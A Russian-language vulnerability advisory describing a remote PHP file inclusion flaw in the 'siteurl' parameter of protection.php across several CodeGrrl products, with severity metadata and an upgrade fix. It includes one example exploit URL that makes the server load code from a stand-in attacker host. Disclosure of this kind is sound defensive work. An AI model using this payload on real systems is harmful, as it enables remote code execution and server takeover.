PHP инклюдинг в продуктах CodeGrrl

Дата публикации:
15.11.2005
Дата изменения:
24.03.2009
Всего просмотров:
3122
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHPCalendar 1.x
PHPClique 1.x
PHPFanBase 2.x
PHPCurrently 2.x
PHPQuotes 1.x
Программы:
PHPCalendar 1.x
PHPClique 1.x
PHPCurrently 2.x
PHPFanBase 2.x
PHPQuotes 1.x

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует при обработке входных данных в параметре "siteurl" сценария protection.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на системе с привилегиями web сервера. Для успешной эксплуатации уязвимости опция register_globals должна быть включена в конфигурационном файле PHP. Пример:

http://www.example.com/protection.php?action=logout
& siteurl=http://yourhost.com/malicoius-code.txt

URL производителя: codegrrl.com

Решение: Установите последнюю версию с сайта производителя.

Источник:

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: PHPCalendar (and some more codegrrl.com products) arbitrary code execution

или введите имя

CAPTCHA